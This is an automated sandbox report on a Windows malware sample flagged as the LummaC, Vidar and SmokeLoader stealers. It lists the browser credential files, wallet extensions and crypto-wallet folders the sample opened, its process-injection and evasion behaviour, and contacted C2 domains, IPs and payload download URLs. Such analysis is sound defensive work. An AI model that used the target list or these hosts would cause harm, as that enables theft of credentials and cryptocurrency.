Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected CryptOne packer
Source: Yara match File source: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAD0C40 sqlite3_bind_zeroblob, 13_2_6CAD0C40
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAD0D60 sqlite3_bind_parameter_name, 13_2_6CAD0D60
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F8EA0 sqlite3_clear_bindings, 13_2_6C9F8EA0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAD0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 13_2_6CAD0B40
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F6410 bind,WSAGetLastError, 13_2_6C9F6410
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F60B0 listen,WSAGetLastError, 13_2_6C9F60B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9FC030 sqlite3_bind_parameter_count, 13_2_6C9FC030
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9FC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 13_2_6C9FC050
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F6070 PR_Listen, 13_2_6C9F6070
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9822D0 sqlite3_bind_blob, 13_2_6C9822D0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F63C0 PR_Bind, 13_2_6C9F63C0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447731 Sample: c3f3d7cea638c32610d85c9c1df... Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 61 whispedwoodmoodsksl.shop 2->61 63 steamcommunity.com 2->63 65 dbfhns.in 2->65 89 Snort IDS alert for network traffic 2->89 91 Multi AV Scanner detection for domain / URL 2->91 93 Found malware configuration 2->93 95 16 other signatures 2->95 11 c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe 2->11         started        14 aarhevh 2->14         started        16 aarhevh 2->16         started        signatures3 process4 signatures5 121 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->121 123 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 11->123 125 Maps a DLL or memory area into another process 11->125 127 Creates a thread in another existing process (thread injection) 11->127 18 explorer.exe 91 7 11->18 injected 129 Antivirus detection for dropped file 14->129 131 Multi AV Scanner detection for dropped file 14->131 133 Machine Learning detection for dropped file 14->133 135 Checks if the current machine is a virtual machine (disk enumeration) 16->135 process6 dnsIp7 67 dbfhns.in 187.143.58.5, 49711, 49712, 49713 UninetSAdeCVMX Mexico 18->67 69 23.145.40.124, 49725, 80 SURFAIRWIRELESS-IN-01US Reserved 18->69 71 3 other IPs or domains 18->71 43 C:\Users\user\AppData\Roaming\aarhevh, PE32 18->43 dropped 45 C:\Users\user\AppData\Local\Temp\C9A7.exe, PE32 18->45 dropped 47 C:\Users\user\AppData\Local\Temp\21AE.exe, PE32 18->47 dropped 49 C:\Users\user\...\aarhevh:Zone.Identifier, ASCII 18->49 dropped 97 System process connects to network (likely due to code injection or exploit) 18->97 99 Benign windows process drops PE files 18->99 101 Deletes itself after installation 18->101 103 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->103 23 C9A7.exe 1 18->23         started        27 21AE.exe 18->27         started        file8 signatures9 process10 dnsIp11 51 C:\Users\user\AppData\Local\...\katA304.tmp, PE32 23->51 dropped 105 Machine Learning detection for dropped file 23->105 107 Contains functionality to inject code into remote processes 23->107 109 Writes to foreign memory regions 23->109 117 3 other signatures 23->117 30 katA304.tmp 1 46 23->30         started        73 whispedwoodmoodsksl.shop 188.114.97.3, 443, 49720, 49722 CLOUDFLARENETUS European Union 27->73 75 185.235.137.54, 49729, 80 AFRARASAIR Iran (ISLAMIC Republic Of) 27->75 111 Antivirus detection for dropped file 27->111 113 Multi AV Scanner detection for dropped file 27->113 115 Detected unpacking (changes PE section rights) 27->115 119 5 other signatures 27->119 35 WerFault.exe 21 27->35         started        file12 signatures13 process14 dnsIp15 77 steamcommunity.com 104.102.42.29, 443, 49746 AKAMAI-ASUS United States 30->77 79 65.109.242.59, 443, 49748, 49750 ALABANZA-BALTUS United States 30->79 53 C:\Users\user\AppData\...\softokn3[1].dll, PE32 30->53 dropped 55 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 30->55 dropped 57 C:\Users\user\AppData\...\mozglue[1].dll, PE32 30->57 dropped 59 10 other files (6 malicious) 30->59 dropped 81 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 30->81 83 Found many strings related to Crypto-Wallets (likely being stolen) 30->83 85 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 30->85 87 5 other signatures 30->87 37 cmd.exe 30->37         started        file16 signatures17 process18 process19 39 conhost.exe 37->39         started        41 timeout.exe 37->41         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
23.145.40.124
 unknown Reserved
22631 SURFAIRWIRELESS-IN-01US true
188.114.97.3
 whispedwoodmoodsksl.shop European Union
13335 CLOUDFLARENETUS true
104.102.42.29
 steamcommunity.com United States
16625 AKAMAI-ASUS true
187.143.58.5
 dbfhns.in Mexico
8151 UninetSAdeCVMX true
185.235.137.54
 unknown Iran (ISLAMIC Republic Of)
202391 AFRARASAIR false
65.109.242.59
 unknown United States
11022 ALABANZA-BALTUS false
186.112.12.192
 unknown Colombia
3816 COLOMBIATELECOMUNICACIONESSAESPCO true
91.202.233.231
 unknown Russian Federation
9009 M247GB true
45.129.96.86
 unknown Estonia
208440 GMHOST-EE true

Contacted Domains

Name IP Active
whispedwoodmoodsksl.shop 188.114.97.3 true
steamcommunity.com 104.102.42.29 true
dbfhns.in 187.143.58.5 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://whispedwoodmoodsksl.shop/api true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://23.145.40.124/pintxi1lv.exe true
  • Avira URL Cloud: safe
 unknown
https://65.109.242.59/ false
  • 7%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
whispedwoodmoodsksl.shop true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://guteyr.cc/tmp/index.php true
  • 16%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://65.109.242.59/nss3.dll false
  • Avira URL Cloud: safe
 unknown
http://185.235.137.54/file/host_so.exe false
  • 20%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
miniaturefinerninewjs.shop true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://65.109.242.59/softokn3.dll false
  • Avira URL Cloud: safe
 unknown
obsceneclassyjuwks.shop true
  • 18%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://65.109.242.59/freebl3.dll false
  • Avira URL Cloud: safe
 unknown
http://45.129.96.86/file/update.exe true
  • 20%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://steamcommunity.com/profiles/76561199689717899 true
  • Avira URL Cloud: safe
 unknown
http://dbfhns.in/tmp/index.php true
  • Avira URL Cloud: safe
 unknown
http://lobulraualov.in.net/tmp/index.php true
  • Avira URL Cloud: safe
 unknown
https://65.109.242.59/mozglue.dll false
  • Avira URL Cloud: safe
 unknown
https://65.109.242.59/vcruntime140.dll false
  • Avira URL Cloud: safe
 unknown
https://65.109.242.59/sqls.dll false
  • Avira URL Cloud: safe
 unknown